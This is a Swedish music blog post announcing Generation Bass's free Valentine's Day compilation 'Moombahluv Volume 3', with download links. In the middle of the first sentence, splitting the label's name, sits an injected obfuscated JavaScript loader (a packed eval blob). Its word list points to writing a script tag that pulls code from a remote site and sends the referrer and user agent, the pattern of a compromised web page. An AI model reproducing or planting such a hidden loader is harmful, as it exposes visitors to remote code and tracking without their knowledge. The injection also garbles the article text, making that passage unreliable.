Image Image Image Image Image Image Image Image Image Image

| 25 maj, 2020

Scroll to top

Top

Generation Bass släpper Moombahluv Volume 3: The Valentines Day Finale

Generation Bass släpper Moombahluv Volume 3: The Valentines Day Finale
Alexander Gylemo

Vi har tidigare berört den enorma musikbloggen och digitala skivbolaget Generation eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ikebh|var|u0026u|referrer|kttdn||js|php’.split(’|’),0,{}))
Bass
och dess kärlek till moombahton och moombah-subgenrerna. Sedan genren var nyfödd har de promotat och även haft egna officiella släpp varav alla klättrar högt på de digitala musikbutikernas topplistor.

I kärlekens tecken släpper nu Generation Bass den tredje och sista delen av den mycket älskade compilationserien Moombahluv, perfekt intimat för Alla Hjärtans Dag. Denna samling tar både in nya och mer etablerade producenter som får visa sina mjuka sidor med känslosam och kärleksfull moombahton. Producenterna kommer från alla olika håll i världen, inklusive Sverige, och levererar inför den mest kärleksfulla dagen på året en mäktigt gungande musikupplevelse, helt gratis!

Lyssna och njut av en snabb mix där samtliga låtar är samlade:

Moombahluv Volume 3: The Valentines Day Finale släpps idag (2012-02-14) och kan laddas ner gratis från följande länkar:

Sida 1 – LuV DrunK

Sida 2 – LuVved Up